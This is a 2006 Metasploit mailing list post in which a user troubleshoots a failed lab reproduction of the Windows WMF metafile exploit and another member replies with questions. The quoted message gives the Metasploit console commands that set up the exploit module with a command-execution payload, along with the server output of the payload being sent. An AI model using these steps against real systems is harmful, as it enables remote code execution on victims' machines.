Metasploit mailing list archives
unable to reproduce WMF exploit
From: devin.ertel at gmail.com (Devin Ertel)
Date: Tue, 10 Jan 2006 07:37:03 -0600
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 What app is associated with the wmf file? Also when you view it in explorer do you have thumbnails turned on? /dev/null wrote:
Sorry, for off-topic... Seem that everybody was able to reproduce the WMF exploit except me :) Here are the steps I performed: - use ie_xp_pfv_metafile - set PAYLOAD win32_exec - set CMD cmd.exe - exploit msf ie_xp_pfv_metafile(win32_exec) > exploit [*] Waiting for connections to http://192.168.0.1:8080/ [*] HTTP Client connected from 192.168.0.10:1075, sending 1592 bytes of payload... The file is saved on disk, but when I open directory in Windows Explorer nothing happens. Well, few times explorer.exe crashed, but that's all. No cmd.exe execution. I don't have indexing disabled... I have tried even with the old versions of the explot, I have tried with Gzip and chunked disabled, I have tried with EXITPROC seh and thread, I used FF, IE and even wget. I don't have DEP enabled, I don't use any AV on my test box... The most amazing thing: when I try calc.bmp generated by Mr.Moore it works like a cham... Obviously I am doing something wrong. ____________________ http://www.email.si/
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFDw7h/yLgRSApisjwRAlfmAKCW/LcKXzsiOSfa+rerlu6gkhOv6gCfT93v ImblMRH9LfERlLS0KvkGAH4= =dTmF -----END PGP SIGNATURE-----
Current thread:
- unable to reproduce WMF exploit /dev/null (Jan 10)
- unable to reproduce WMF exploit Devin Ertel (Jan 10)
- unable to reproduce WMF exploit H D Moore (Jan 10)
- unable to reproduce WMF exploit Michael Wood (Jan 12)
- unable to reproduce WMF exploit H D Moore (Jan 12)
- <Possible follow-ups>
- unable to reproduce WMF exploit /dev/null (Jan 10)